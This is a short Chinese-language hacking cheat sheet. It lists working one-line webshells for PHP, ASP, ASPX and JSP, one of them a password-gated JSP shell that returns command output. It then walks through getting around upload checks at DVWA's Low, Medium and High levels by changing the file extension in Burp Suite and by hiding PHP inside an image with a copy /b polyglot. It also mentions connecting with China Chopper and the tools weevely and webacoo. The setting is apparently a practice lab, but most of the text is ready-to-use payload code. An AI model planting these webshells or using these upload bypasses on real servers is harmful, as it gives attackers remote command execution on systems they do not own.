一句話木馬
常用於php、asp、aspx
php
<?php echo shell_exec($_GET['cmd']);?>
asp
<%execute(request("value"))%>
aspx
<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>
jsp
無回顯執行系統命令
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
請求:http://192.168.16.240:8080/Shell/cmd2.jsp?cmd=ls
執行之后不會有任何回顯,用來反彈個shell很方便。
有回顯帶密碼驗證的
<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
請求:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=123&cmd=ls /
上傳文件
通過Burp Suite繞過前端驗證文件格式,通過修改數據包通過后端檢驗。
安全級別Low
前后端沒有任何驗證
安全級別Medium
僅前端判斷文件后綴名
當前端提示不能發送非jpg、png格式時,Burp Suite配置好Proxy -》 Options,並在Proxy-》Intercept-》Intercept is on,瀏覽器設置代理為Options中的配置
首先把shell.php后綴改為jpg,然后提交,在filename中把文件shell.jpg后綴改為shell.php
安全級別High
准備一個圖片和shell.php腳本,windows下運行
copy 1.png/b+shell.php/a shell.png
將圖片上傳后,使用中國菜刀連接(中國菜刀可以把圖片當成php執行)
訪問
這里以php的 <?php echo shell_exec($_GET['cmd']);?> 為例子
訪問一句話木馬文件(要知道上傳的文件目錄)
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=ls
php中的cmd是參數
可以看到cmd參數為ls是直接查詢當前目錄下的文件
同樣可以操作其他目錄文件
其他kali下的web后門工具
webacoo
僅適用於php
weevely
僅適用於php
參考
https://blog.csdn.net/weixin_39190897/article/details/86771918